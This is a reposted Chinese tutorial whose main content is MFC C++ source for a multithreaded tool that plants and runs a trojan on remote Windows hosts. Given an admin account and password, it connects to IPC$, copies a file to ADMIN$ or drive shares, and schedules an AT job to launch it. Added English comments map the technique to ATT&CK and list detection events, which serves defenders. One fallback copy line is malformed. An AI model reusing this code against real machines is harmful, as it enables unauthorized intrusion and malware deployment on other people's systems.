VC++多线程远程IPC种植木马
主要实现代码如下/////////////////////////////////////////////////////////////////////////////////////
// Per-target work item handed from the dialog to the worker thread.
// Every field is copied out again at the top of ThreadIpcConnect.
typedef struct TagHost
{
CString host; // target machine; used to build the \\host\... UNC paths
CString user; // account name passed to WNetAddConnection2
CString pass; // password passed to WNetAddConnection2 (held as plain text in memory)
CString filename; // name the file is given on the remote share
CString LocalFilePath; // local source path given to CopyFile
CListBox* list; // dialog list box that receives the per-host status line
}IPC;
// Button handler: snapshots the dialog's current target, credentials and file
// settings into an IPC record allocated with new, then starts one worker thread for it.
// NOTE(review): the text after "OnStart()" on the signature line is the article's own
// label ("starts the thread"), not C++; it is left exactly as published.
void CShareDlg::OnStart() 启动线程序
{
UpdateData(TRUE); // pull the current control values into the m_* members
IPC* ipc = new IPC; // becomes the thread's LPVOID argument
ipc->host = m_host;
ipc->user = m_user;
ipc->pass = m_pass;
ipc->LocalFilePath = m_localfile;
// NOTE(review): `filename` is not declared anywhere in this listing -
// presumably a member or global set elsewhere; confirm against the full source.
ipc->filename = filename;
ipc->list = &m_list;
AfxBeginThread(ThreadIpcConnect,ipc); // one thread per invocation of this handler
}
线程/////////////////////////////////////////////////////////////////////////////////////////////////
// Worker thread for one target host; lpvoid is the IPC record built in OnStart.
// Sequence visible below:
//   1. WNetAddConnection2 to \\host\ipc$ with the supplied account and password.
//   2. CopyFile of the local file to \\host\admin$, falling back to C$, D$, E$, F$.
//   3. NetRemoteTOD to read the target's clock.
//   4. NetScheduleJobAdd to register an AT job on the target.
// One status string per host is appended to the dialog's list box.
//
// Defender notes: this is the admin-share copy plus remote AT job pattern
// (MITRE ATT&CK T1021.002, T1570, T1053.002). On the target it typically appears as
// a network logon (Security event 4624, logon type 3), share access to IPC$ and
// ADMIN$/C$ (5140, and 5145 when detailed file-share auditing is enabled), a new
// file written to the root of an administrative share, and a new scheduled job
// (4698 where object-access auditing covers it; AT jobs have historically been
// stored as At<N>.job under %SystemRoot%\Tasks). Restricting inbound SMB between
// hosts, unique local administrator passwords, and remote UAC token filtering for
// local accounts all reduce exposure to this pattern.
UINT ThreadIpcConnect(LPVOID lpvoid)
{
IPC* ipc;
CListBox* list;
ipc = (IPC*)lpvoid;
// Local copies of every field in the work item.
CString host;
CString admin;
CString pass;
CString filename;
CString localfilepath;
host = ipc->host ;
pass = ipc->pass;
admin = ipc->user;
localfilepath = ipc->LocalFilePath;
filename =ipc->filename ;
list = ipc->list;
BOOL IpcConnect; // reused below for both the connection result and each CopyFile result
LPTIME_OF_DAY_INFO TimeBuf=NULL; // filled in by NetRemoteTOD
NET_API_STATUS Status;
// CmdCom is the command string later given to the AT job; it starts as "admin$\\"
// and is replaced with a drive-letter path in the fallback branches.
CString RemoteFilePath,CmdCom("admin$\\");
// ---- IPC$ connection ----
NETRESOURCE ns;
TCHAR buf[MAX_PATH];
wsprintf(buf,"\\\\%s\\ipc$",host); // UNC name of the target's IPC$ share
ZeroMemory(&ns,sizeof(ns));
ns.dwScope=RESOURCE_GLOBALNET;
ns.dwType=RESOURCETYPE_ANY;
ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC;
ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;
ns.lpLocalName=""; // no local device name is assigned to the connection
ns.lpRemoteName=buf;
ns.lpProvider=NULL;
ns.lpComment=NULL;
CString hhost = host; // second copy of the host name, used for NetScheduleJobAdd
IpcConnect =WNetAddConnection2(&ns,pass,admin,0);
// establish the IPC$ connection
if(IpcConnect)
{
// author's note: after the connection succeeds
// ---- author's note: connection succeeded, upload the file ----
RemoteFilePath=("\\\\"+host+"\\admin$\\"+filename);
IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE); // FALSE: an existing remote file is overwritten
// copy the file to admin$ (winnt); if that fails, try the other administrative shares
if(!IpcConnect)
{
RemoteFilePath=("\\\\"+host+"\\C$\\"+filename);
CmdCom="C:\\"+filename;
IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
if(!IpcConnect)
{
RemoteFilePath=("\\\\"+host+"\\D$\\"+filename);
CmdCom="D:\\"+filename;
IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
if(!IpcConnect)
{
RemoteFilePath=("\\\\"+host+"\\E$\\"+filename);
CmdCom="E:\\"+filename;
IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
if(!IpcConnect)
{
RemoteFilePath ("\\\\"+host+"\\F$\\"+filename);
CmdCom = "F:\\"+filename;
IpcConnect = CopyFile(localfilepath,RemoteFilePath,FALSE);
}
}
}
}
// ---- get the remote host's time ----
if(IpcConnect)
{// fetch the remote host's time
Status=NetRemoteTOD(host.AllocSysString(),(LPBYTE *)&TimeBuf);
if(Status==NERR_Success)
{// time retrieved successfully
// ---- start the target file ----
DWORD day=1,JobTime; // JobTime receives NetScheduleJobAdd's output value
AT_INFO ai;
day=day*2;
ai.Command=CmdCom.AllocSysString();
ai.DaysOfMonth=day;
ai.DaysOfWeek=0;
ai.Flags=JOB_NONINTERACTIVE;
// Milliseconds after midnight: the remote hour shifted by tod_timezone,
// plus the remote minute + 1.
ai.JobTime=((TimeBuf->tod_hours+(-TimeBuf->tod_timezone)/60)%24)*60*60*1000+(TimeBuf->tod_mins+1)*60*1000;
Status=NetScheduleJobAdd(hhost.AllocSysString(),(LPBYTE)&ai,&JobTime);
// author's note: start the uploaded file, one minute from now
if(Status==NERR_Success)
{
list->AddString(host+"启动成功");
}
else
list->AddString(host+"启动失败");
}
else
{
list->AddString(host+"获取时间失败");
}
}
else
{
list->AddString(host+"复制文件失败");
}
}
else
list->AddString(host+"连接失败");
return TRUE; // thread exit code
}
欢迎大家可以找我一起学习,QQ:27272855;如果大家要源代码,来找我,我没空间,所以没。。。。。。。。。
=========================
文章类型:转载 提交:特务 核查:NetDemon